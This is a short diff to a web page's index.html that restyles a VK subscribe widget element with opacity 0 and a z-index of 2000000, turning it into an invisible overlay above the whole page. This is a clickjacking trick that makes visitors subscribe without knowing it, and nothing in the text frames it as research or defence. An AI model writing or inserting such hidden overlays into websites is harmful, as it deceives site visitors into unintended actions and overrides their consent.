--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
 </head>
 <body>
 
-<div id="vk_subscribe"></div>
+<div id="vk_subscribe" style="z-index: 2000000;opacity: 0;"></div>
 
 <style>
     body{
